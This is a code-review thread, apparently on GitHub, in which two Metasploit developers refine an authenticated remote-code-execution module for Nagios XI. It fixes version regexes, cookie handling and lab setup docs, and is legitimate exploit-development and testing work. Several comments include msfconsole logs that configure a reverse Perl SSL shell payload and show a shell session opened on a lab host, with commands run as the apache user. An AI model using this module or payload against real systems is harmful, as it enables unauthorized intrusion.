2023-02-06 19:10 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
[2009r1.4bi](https://assets.nagios.com/downloads/nagiosxi/2009/xi-2009r1.4bi.tar.gz) is another edge case we'd need to handle here along with [2009r1fix](https://assets.nagios.com/downloads/nagiosxi/2009/xi-2009r1fix.tar.gz). I'll see if I can't combine this all into one regex for ya.

2023-02-06 19:19 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
Okay found a regex that works to handle all the cases here:

```
^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$
```

2023-02-06 19:30 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
Okay should be able to alter it to this:

```
if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
```

2023-02-06 19:30 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    end
See later comment, think I found a solution that should work for us 😄

2023-02-06 19:39 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
Wonderful, made this change and tested it locally

2023-02-06 19:40 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
Marking as resolved 👍

2023-02-06 19:54 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      @auth_cookies = res_array[1]
My only thought here is if we should be regex'ing the cookies here since in theory if another code outside of the range 1-5 inclusive returns 2 elements, then we will end up setting `@auth_cookies` to the first element of that result, which may not be valid. This is partially negated by the `nsp_str` check later on, though we should still do due dilligence.

2023-02-06 20:03 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      @auth_cookies = res_array[1]
There's a `clean_cookies` method that gets used on the cookies in `login.rb` that are parsed out of the headers precisely due to some weirdness in NagiosXI where it sends back multiple set-cookies requests, etc. to protect against some of this. By the time it reaches us, it should either be nil or a valid cookie (assuming we trust the clean_cookies method and the login function to return the cookie). I could add a nil check similar to nsp before setting it though? The reason I needed to add the nsp regex is because the nsp itself isn't returned, rather the entire response body. There is a `get_nsp` method in `login.rb`, but it takes an entire response object as input, not the string body so I couldn't use it directly.

2023-02-06 20:29 UTC, k0pak4 commented
> Alright I think this should be ready for testing, just going over the 4 commits you made to see if there is anything I might have missed, and then will set up a target and test the module against it. Thanks for all the effort you put into this, at over 100 comments I know this is growing a bit long in the tooth but should get this landed soon 👍

I think the module is in a much better place now, I appreciate the thorough and detailed reviews. I checked the other authenticated NagiosXI modules and they could take advantage of some of the suggestions and updates made to this module, so I opened an issue for it (https://github.com/rapid7/metasploit-framework/issues/17606). Given that a lot of the code could be reused during fixing, and that NagiosXI is fairly easy to install even older versions, it's probably a good candidate to be labeled newbie-friendly

2023-02-06 20:29 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      @auth_cookies = res_array[1]
So `clean_cookies` just removes bad cookies from what I can tell. It doesn't verify that the existing ones are indeed valid. The issue here comes more down to the fact that you are trusting that a return code from the library, which is not in the range 1-5, and which contains two elements, will always have the first element set to an auth cookie.

Point being we shouldn't assume that all future actions potentially added to this library which return a 2 element array will be in the format `[SOMETHING ELSE HERE, auth_cookies]`. Right now this code is relying partly on this expectation, which is only being somewhat mitigated by the fact that `SOMETHING ELSE HERE` is currently being checked to see that it conforms to the format of a NSP.

2023-02-06 20:32 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      @auth_cookies = res_array[1]
Okay, then I think I can add a regex check for this as well as a nil check then. All of the versions that this exploit works on have the same cookie name, so it should be safe to use a regex for. If the regex failed, we'd be on a version it doesn't work on anyway, and the module would fail also so I think it's safe to add

2023-02-06 20:33 UTC, gwillcox-r7 commented
> > Alright I think this should be ready for testing, just going over the 4 commits you made to see if there is anything I might have missed, and then will set up a target and test the module against it. Thanks for all the effort you put into this, at over 100 comments I know this is growing a bit long in the tooth but should get this landed soon 👍
> 
> I think the module is in a much better place now, I appreciate the thorough and detailed reviews. I checked the other authenticated NagiosXI modules and they could take advantage of some of the suggestions and updates made to this module, so I opened an issue for it (#17606). Given that a lot of the code could be reused during fixing, and that NagiosXI is fairly easy to install even older versions, it's probably a good candidate to be labeled newbie-friendly

Thanks added the newbie-friendly and easy tags so it should be easier for those new to Metasploit to work on this 👍

2023-02-06 20:41 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      @auth_cookies = res_array[1]
Added verification of the auth_cookies in `[cdf6837](https://github.com/rapid7/metasploit-framework/pull/17494/commits/cdf6837825a0c803f2fe73f365f5a679fee59c20)`

2023-02-06 20:41 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      @auth_cookies = res_array[1]
Looks good thanks for adding this in @k0pak4!

2023-02-06 20:42 UTC, gwillcox-r7 commented
All comments resolved, will download latest updates and test now.

2023-02-06 20:52 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +    3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
Extra stuff I had to do:

1. Log in with username `root` and password `nagiosxi`.
2. Found I couldn't run `ipconfig` and the IP address wasn't showing up on the banner for some reason.
3. Had to change the OVA network from Bridged to NAT
4. Run `ip a` to get the IP address of the machine.
5. Go through defaults on the install. When you get to `Admin Account Settings` change the password from the generated one to `nagiosadmin`.

Think should mention some of these steps to help with troubleshooting potential errors.

2023-02-06 20:57 UTC, gwillcox-r7 commented
Tried this against a target with most things up but license wasn't signed and got this:

```
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit

[*] Started reverse SSL handler on 192.168.153.128:9983 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[+] Successfully authenticated to Nagios XI.
[!] The service is running, but could not be validated. Failed to extract authentication cookies
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[+] Successfully authenticated to Nagios XI.
[-] Exploit aborted due to failure: unexpected-reply: Failed to extract authentication cookies
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > 
```

2023-02-06 21:03 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Looks like `auth_cookies` here was coming up as `d657c8a22feb524717c3c5e81c0c8d5ed8a1f6a94445ec8066f9f501f0b43ac8` in a sample run. This looks like a SHA256 hash, so might be possible to match on that?

2023-02-06 21:08 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Yeah I wasn't 100% certain that the hash type would be the same, only that they contain `nagiosxi` as the cookie name. My auth_cookie on 5.7.5 looked like `nagiosxi=ob7nfd080jj42drfn52j7lfpk0;`

2023-02-06 21:12 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
This check is presently failing as `.scan` will return an empty array if no match is found, which will pass the `if` check, and will cause an attempt to retrieve `[ ][0][0]`

2023-02-06 21:12 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
I'm also not seeing anything coming into this function with `nsp_str` in the name at all?

2023-02-06 21:13 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Thats odd cause I'm seeing only one string `nagiosxi=`, in parameter 0, aka the first parameter, not the second parameter as is being checked here.

2023-02-06 22:03 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Yeah, if the auth fails (which I think is the case as I mentioned above when the license agreement isn't signed), there won't be an nsp_str. I will add a better check for that regex, and check it is't an empty array

2023-02-06 22:04 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
If it was on the same run from before with the failed license agreement, I think it's due to the auth failing

2023-02-06 22:20 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
I think we can convert this into just a `.match` call instead?

2023-02-06 22:21 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Otherwise authentication should be working with the creds I'm giving the application but its possible something might be failing. I'll dig into the HTTP logs more.

2023-02-06 22:23 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Hmm doesn't quite explain the wrongly ordered parameters. See below:

![image](https://user-images.githubusercontent.com/63261883/217101054-c7954245-6e1e-4929-b113-3c61f46ae6b1.png)

2023-02-06 22:27 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Yeah, I think it's because in this code snippet from `login.rb`:
```      return [5, [auth_cookies, nsp]]
    end

    # Return the HTTP resonse body and the authentication cookies.
    # The response body can be used to obtain the version number.
    # The cookies can be used by exploit modules to send authenticated requests.
    [0, [res_index.body, auth_cookies]]
    ```
    It looks like when you get a return code of 5, the positioning is swapped

2023-02-06 22:29 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Ah my bad I posted an update here but now I realize what you mean, in that if the auth fails then the parameters will not be in the order expected.

2023-02-06 22:30 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Yep makes sense. I recall working with the original author of this library and some of the choices seemed odd but okay at the time. Looks like this one slipped past my radar, so apologies for that 😞

2023-02-06 22:30 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Yeah I don't particularly like that they're swapped, it's not intuitive that in one case it's reversed from the other but I'm wary to change it here because I'm not sure if the other modules would break

2023-02-06 22:32 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
I do recall some of the choices we made with this library did seem a little odd at the time. Whilst I don't think that we should always expect things to be in the same order in terms of parameter order, I do agree this was likely an oversight when I was reviewing this code I should have noticed 😞

2023-02-06 22:32 UTC, k0pak4 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +    3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
Yeah there's some troubleshooting errors I can add. Another weird one I kept having in the older versions was my nagiosxi time would be incorrect and I needed to manually set it. I'll make a note to either change the password or note the generated one also. No reason it has to be nagiosadmin, but you'll need to know the value for the module to work.

2023-02-06 22:40 UTC, gwillcox-r7 commented
> > Tried this against a target with most things up but license wasn't signed and got this:
> > ```
> > msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
> > 
> > [*] Started reverse SSL handler on 192.168.153.128:9983 
> > [*] Running automatic check ("set AutoCheck false" to disable)
> > [*] Attempting to authenticate to Nagios XI...
> > [!] The Nagios XI license agreement has not yet been signed on the target.
> > [+] Successfully authenticated to Nagios XI.
> > [!] The service is running, but could not be validated. Failed to extract authentication cookies
> > [*] Attempting to authenticate to Nagios XI...
> > [!] The Nagios XI license agreement has not yet been signed on the target.
> > [+] Successfully authenticated to Nagios XI.
> > [-] Exploit aborted due to failure: unexpected-reply: Failed to extract authentication cookies
> > [*] Exploit completed, but no session was created.
> > msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > 
> > ```
> 
> I believe this is being caused by which CheckCode I decided to return when it failed to install/sign the license agreement. I used `Detected` in this case, which I guess doesn't stop the exploit from attempting to continue. Then it tries to auth again, and fails to sign again. Should I use a different check code so that this behavior doesn't happen on a failed signing?

I guess we could use `CheckCode::Safe` but tbh that feels like it would run into a false negative situation. I think honestly the issue atm is that your `case login_result` code within the initial `case` statement in `authenticate` doesn't handle case `5` like it should, only cases 1 to 4, so this is an oversight there.

2023-02-06 22:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Fixed in https://github.com/rapid7/metasploit-framework/pull/17494/commits/71554c57805613db963a7948d61dcbe7f6286f41

2023-02-06 22:51 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +  - Set it manually with `timedatectl set-ntp false` and `timedatectl set-time 2023-02-06 17:34:00` but with the actual time and date
This is incorrect. There needs to be one argument passed into `timedatectl` otherwise it will fail with an argument error. Personally I found putting the two strings together as one worked:

```
timedatectl set-time 2023-02-0617:34:00
```

2023-02-06 22:52 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +  - Set it manually with `timedatectl set-ntp false` and `timedatectl set-time 2023-02-06 17:34:00` but with the actual time and date
After executing this the host seemed to stop accepting connections?

2023-02-06 22:57 UTC, k0pak4 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +  - Set it manually with `timedatectl set-ntp false` and `timedatectl set-time 2023-02-06 17:34:00` but with the actual time and date
oh yeah I meant to put quotes in the instruction. It has to be `timedatectl set-time '2023-02-06 17:57:00'`

2023-02-06 23:00 UTC, gwillcox-r7 commented
Going to push up a change now which should solve one of the issues.

2023-02-06 23:01 UTC, k0pak4 commented
> > > Tried this against a target with most things up but license wasn't signed and got this:
> > > ```
> > > msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
> > > 
> > > [*] Started reverse SSL handler on 192.168.153.128:9983 
> > > [*] Running automatic check ("set AutoCheck false" to disable)
> > > [*] Attempting to authenticate to Nagios XI...
> > > [!] The Nagios XI license agreement has not yet been signed on the target.
> > > [+] Successfully authenticated to Nagios XI.
> > > [!] The service is running, but could not be validated. Failed to extract authentication cookies
> > > [*] Attempting to authenticate to Nagios XI...
> > > [!] The Nagios XI license agreement has not yet been signed on the target.
> > > [+] Successfully authenticated to Nagios XI.
> > > [-] Exploit aborted due to failure: unexpected-reply: Failed to extract authentication cookies
> > > [*] Exploit completed, but no session was created.
> > > msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > 
> > > ```
> > 
> > 
> > I believe this is being caused by which CheckCode I decided to return when it failed to install/sign the license agreement. I used `Detected` in this case, which I guess doesn't stop the exploit from attempting to continue. Then it tries to auth again, and fails to sign again. Should I use a different check code so that this behavior doesn't happen on a failed signing?
> 
> I guess we could use `CheckCode::Safe` but tbh that feels like it would run into a false negative situation. I think honestly the issue atm is that your `case login_result` code within the initial `case` statement in `authenticate` doesn't handle case `5` like it should, only cases 1 to 4, so this is an oversight there.

Yeah I don't think CheckCode::Safe is the right one either. It looks like both the check and execute_command have a case statement for 5:
```
    when 2, 4, 5, 6
      return CheckCode::Detected(err_msg)
or
  when 2, 4, 5, 6
        fail_with(Failure::UnexpectedReply, err_msg)
```

2023-02-06 23:03 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +  - Set it manually with `timedatectl set-ntp false` and `timedatectl set-time 2023-02-06 17:34:00` but with the actual time and date
Ah thanks!

2023-02-06 23:05 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Ultimately I think this is a good point to raise on that issue that you opened, it just likely would elevate that part of the request from being a beginner friendly request to something someone a bit more experienced should take on. I still think its a good request though as it prevents extra overhead on the module author's part.

2023-02-06 23:05 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +    3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
Resolved with https://github.com/rapid7/metasploit-framework/pull/17494/commits/71554c57805613db963a7948d61dcbe7f6286f41

2023-02-06 23:07 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    })
This was removed as I found it actually ended up preventing error detection in some cases. I'll add it back in once I finished testing but in one case it hid the NSP Dave error message as a result of it thinking the exploit had completed once the request had been sent, and then it didn't get a response immediately so it thought the payload must have failed to execute vs waiting around a bit.

2023-02-06 23:16 UTC, gwillcox-r7 commented
Alright at the moment I'm getting all the way to the final stage and then I'm getting `NSP: Sorry Dave, I can't let you do that` error messages when trying to send the payload. Not sure why that is occurring atm.

2023-02-06 23:32 UTC, gwillcox-r7 commented
Okay figured out that with the update to `match` we needed to update the resulting entry to `nsp[1]` instead of `nsp[0]` otherwise we get extra characters. Going to run a quick double check then push up a fix.

2023-02-07 12:14 UTC, k0pak4 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +  - Set it manually with `timedatectl set-ntp false` and `timedatectl set-time 2023-02-06 17:34:00` but with the actual time and date
I added quotes to the command in the docs, wouldn't want a copy paste to bork someone's VM if they try to use it

2023-02-07 12:16 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    })
Got it. Does it need to be added back or was your experience that the exploit continued to work without it?

2023-02-07 12:17 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
I added it as an additional improvement to be made in the issue I opened. I agree it's something that would help module authors

2023-02-07 16:23 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +  - Set it manually with `timedatectl set-ntp false` and `timedatectl set-time 2023-02-06 17:34:00` but with the actual time and date
Resolved with https://github.com/rapid7/metasploit-framework/pull/17494/commits/17bae2b5dd07269eca9fd8c39a68e0eb108de7b8

2023-02-07 16:24 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
Marking this as resolved as with recent updates this didn't seem to be an issue, and was a side effect of bad switch case logic.

2023-02-07 16:25 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    })
Marking this as resolved for now since its not negatively affecting exploitation in my experience.

2023-02-07 17:03 UTC, gwillcox-r7 commented
Alright seems this is all working now. Only question I have is a minor one r.e why it seems that it fails to extract authentication cookies on the first authentication attempt and then seems to succeed on the second:

```
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
[*] Using configured payload cmd/unix/reverse_perl_ssl
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.135
RHOST => 192.168.153.135
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
USERNAME => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes signing the license agreement.
   PASSWORD        nagiosadmin      no        Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.153.135  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on al
                                              l addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   TARGET_CVE      CVE-2021-25296   yes       CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      no        Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.153.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   CMD



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit

[*] Started reverse SSL handler on 192.168.153.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] No response received from the server. This can happen after installing Nagios XI or signing the license agreement
[*] The module will wait for 5 seconds and retry.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] License agreement signed. The module will wait for 5 seconds and retry the login.
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[!] The service is running, but could not be validated. Failed to extract authentication cookies
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[*] Sending the payload...
[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.135:57360) at 2023-02-07 10:59:38 -0600

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
pwd
/usr/local/nagiosxi/html/config
uname -a
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```

2023-02-07 17:13 UTC, gwillcox-r7 commented
Okay whilst testing I found another bug in my logic so going to go ahead and fix that up so long. At this point its likely that this needs another code review given the number of bugs encountered during testing.

2023-02-07 17:31 UTC, k0pak4 commented
> Alright seems this is all working now. Only question I have is a minor one r.e why it seems that it fails to extract authentication cookies on the first authentication attempt and then seems to succeed on the second:
> 
> ```
> msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
> [*] Using configured payload cmd/unix/reverse_perl_ssl
> msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.135
> RHOST => 192.168.153.135
> msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
> LHOST => 192.168.153.128
> msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
> USERNAME => nagiosadmin
> msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
> PASSWORD => nagiosadmin
> msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
> 
> Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
> 
>    Name            Current Setting  Required  Description
>    ----            ---------------  --------  -----------
>    FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes signing the license agreement.
>    PASSWORD        nagiosadmin      no        Password to authenticate with
>    Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
>    RHOSTS          192.168.153.135  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
>    RPORT           80               yes       The target port (TCP)
>    SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on al
>                                               l addresses.
>    SRVPORT         8080             yes       The local port to listen on.
>    SSL             false            no        Negotiate SSL/TLS for outgoing connections
>    SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
>    TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
>    TARGET_CVE      CVE-2021-25296   yes       CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)
>    URIPATH                          no        The URI to use for this exploit (default is random)
>    USERNAME        nagiosadmin      no        Username to authenticate with
>    VHOST                            no        HTTP server virtual host
> 
> 
> Payload options (cmd/unix/reverse_perl_ssl):
> 
>    Name   Current Setting  Required  Description
>    ----   ---------------  --------  -----------
>    LHOST  192.168.153.128  yes       The listen address (an interface may be specified)
>    LPORT  4444             yes       The listen port
> 
> 
> Exploit target:
> 
>    Id  Name
>    --  ----
>    2   CMD
> 
> 
> 
> View the full module info with the info, or info -d command.
> 
> msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
> FINISH_INSTALL => true
> msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
> [!] Changing the SSL option's value may require changing RPORT!
> SSL => true
> msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
> RPORT => 443
> msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
> 
> [*] Started reverse SSL handler on 192.168.153.128:4444
> [*] Running automatic check ("set AutoCheck false" to disable)
> [*] Attempting to authenticate to Nagios XI...
> [!] The target seems to be a Nagios XI application that has not been fully installed yet.
> [*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
> [*] Attempting to authenticate to Nagios XI...
> [!] No response received from the server. This can happen after installing Nagios XI or signing the license agreement
> [*] The module will wait for 5 seconds and retry.
> [*] Attempting to authenticate to Nagios XI...
> [!] The Nagios XI license agreement has not yet been signed on the target.
> [*] Attempting to sign the Nagios XI license agreement...
> [*] License agreement signed. The module will wait for 5 seconds and retry the login.
> [*] Attempting to authenticate to Nagios XI...
> [+] Successfully authenticated to Nagios XI.
> [!] The service is running, but could not be validated. Failed to extract authentication cookies
> [*] Attempting to authenticate to Nagios XI...
> [+] Successfully authenticated to Nagios XI.
> [*] Target is Nagios XI with version 5.7.5.
> [*] Sending the payload...
> [*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.135:57360) at 2023-02-07 10:59:38 -0600
> 
> id
> uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
> pwd
> /usr/local/nagiosxi/html/config
> uname -a
> Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
> ```

I'm not sure exactly why, but it does appear that its part of the logic of logging in after accepting the license:
```
def login_after_install_or_license(username, password, finish_install)
    # After installing Nagios XI or signing the license agreement, we sometimes don't receive a server response.
    # This loop ensures that at least 2 login attempts are performed if this happens, as the second one usually works.
    second_attempt = false
    while true
      login_result, error_message = nagios_xi_login(username, password, finish_install)

      break unless error_message == ['Connection failed']

      if second_attempt
        print_warning('The server is still not responding. If you wait a few seconds and rerun the module, it might still work.')
        break
      else
        print_warning('No response received from the server. This can happen after installing Nagios XI or signing the license agreement')
        print_status('The module will wait for 5 seconds and retry.')
        second_attempt = true
        sleep 5
      end
    end
```
So I think that is at least somewhat expected that the first attempt post-accepting might fail

2023-02-07 17:36 UTC, gwillcox-r7 commented
@k0pak4 Figured out the bug. Turns out when I refactored I didn't correctly update both the login status code and the message being returned. In fact I think I might have at best only updated the login code and not the message, and at worst may have been using `==` instead of `=` to set the variable.

All entirely my fault, but got a fix for it now that I'll push up. Wanted to try centralize that logic and expected I might run into some issues 👍

2023-02-07 17:51 UTC, gwillcox-r7 approved these changes

2023-02-07 18:20 UTC, gwillcox-r7 commented
Fixed a few issues I noticed in the docs review, namely some incorrect CVE numbers due to me switching some of the numbers around, and an update to accomidate the 5.5.7 point on the parameter name changing. Still need to add a scenario for 5.5.6 so we have our range of testing to claim we cover the versions we claim to target; atm we just have 5.7.5 as tested in the documentation.

2023-02-07 19:31 UTC, k0pak4 commented
> Fixed a few issues I noticed in the docs review, namely some incorrect CVE numbers due to me switching some of the numbers around, and an update to accommodate the 5.5.7 point on the parameter name changing. Still need to add a scenario for 5.5.6 so we have our range of testing to claim we cover the versions we claim to target; atm we just have 5.7.5 as tested in the documentation.

Good point. I have 5.5.6 installed currently so just added a scenario for it, specifically with CVE-2021-25297 since it uses a different parameter in that version, so is a better representative example

2023-02-07 19:31 UTC, gwillcox-r7 commented
Thanks for the example addition @k0pak4!

2023-02-07 19:54 UTC, gwillcox-r7 requested changes
